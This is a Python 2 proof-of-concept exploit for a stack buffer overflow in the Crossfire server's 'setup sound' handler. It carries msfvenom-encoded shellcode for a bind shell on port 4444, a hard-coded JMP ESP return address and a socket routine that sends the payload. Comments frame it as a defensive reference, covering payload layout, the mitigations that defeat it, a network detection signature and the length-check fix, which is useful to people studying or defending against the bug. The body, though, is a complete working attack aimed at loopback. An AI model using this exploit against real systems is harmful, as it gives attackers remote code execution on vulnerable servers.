#!/usr/bin/python
# Proof-of-concept for a stack-based buffer overflow in the Crossfire server's
# "setup sound" command handler, reached over TCP port 13327.
#
# Python 2 only: the bare `print` statements are a syntax error under Python 3,
# and the payload relies on Python 2 `str` being a byte string.
#
# Kept as a defensive reference: the `buffer` built below is exactly what the
# malicious traffic looks like on the wire, and the comments on `ret` list the
# platform mitigations this particular chain depends on being absent.
#nasm > add eax,12
#00000000 83C00C add eax,byte +0xc
#nasm > jmp eax
#00000000 FFE0 jmp eax
#nasm >
# 0x08134597: jmp esp
#ret = "\x97\x45\x13\x08"
import socket
# Loopback only: written against a local lab instance of the server.
host="127.0.0.1"
#crash="\x41" * 4368 + "\x42" * 4 + "C" * 7
# crash = "\x41" * 4368 + "\x42" * 4 + "\x83\xC0\x0C\xFF\xE0" + "\x90\x90"
# Memory address of JMP ESP instruction
# The address is hard-coded and little-endian packed. An 0x0813xxxx address
# looks like a fixed, non-PIE text-segment address, and jumping through ESP
# into the overflowed buffer requires an executable stack. PIE/ASLR or NX
# alone would break this chain, independent of fixing the length check.
ret = "\x97\x45\x13\x08"
# generated by msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b '\x00\x0a\x0d\x20' --platform linux -a x86 -e x86/shikata_ga_nai
# creates a bind shell payload (port listening on victim)
# 7 lines x 15 bytes = 105 bytes. The "- 105" below keeps the overflowing
# region at exactly 4368 bytes, matching the crash pattern in the comment above.
# Note the encoder excludes the four bytes listed after -b (NUL, LF, CR, space),
# i.e. characters the command parser would treat as terminators/separators.
shellcode = ("\xdd\xc1\xba\x23\x27\xcb\xe2\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x14\x31\x56\x19\x83\xc6\x04\x03\x56\x15\xc1\xd2\xfa\x39\xf2"
"\xfe\xae\xfe\xaf\x6a\x53\x88\xae\xdb\x35\x47\xb0\x47\xe4\x05"
"\xd8\x75\x18\xbb\x44\x10\x08\xea\x24\x6d\xc9\x66\xa2\x35\xc7"
"\xf7\xa3\x87\xd3\x44\xb7\xb7\xba\x67\x37\xf4\xf2\x1e\xfa\x7b"
"\x61\x87\x6e\x43\xde\xf5\xee\xf2\xa7\xfd\x86\x2b\x77\x8d\x3e"
"\x5c\xa8\x13\xd7\xf2\x3f\x30\x77\x58\xc9\x56\xc7\x55\x04\x18")
# The x86 opcode instructions says ADD,EAX,12 Bytes (shift offset by 12 bytes), and then JMP EAX
# That lands right into the beginning of the shellcode and the return address is the location of the buffer of A's
# Layout, low to high address:
#   shellcode (105 B) | 0x41 filler | saved-return overwrite (ret) | 5-byte stub | 2 x NOP
crash = shellcode + "\x41" * (4368-105) + ret + "\x83\xC0\x0C\xFF\xE0" + "\x90\x90"
# Wire format: a leading 0x11 byte, the ASCII command text "(setup sound ",
# the ~4.4 KB payload, then "\x90\x00#" as the trailer.
# Detection note: a legitimate "setup sound" argument is a short token. An
# argument of several kilobytes containing non-printable bytes on port 13327
# is a clear anomaly for a network signature, and the fix on the server side
# is a length check on this argument before it is copied to the stack.
buffer = "\x11(setup sound " + crash + "\x90\x00#"
# Plain TCP client, no timeout set: connect/recv block indefinitely.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending evil buffer..."
s.connect((host, 13327))
s.send(buffer)
# Reads up to 1024 bytes of whatever the server returns; it is printed, not checked.
data=s.recv(1024)
print data
s.close()
print "[*]Payload Sent !"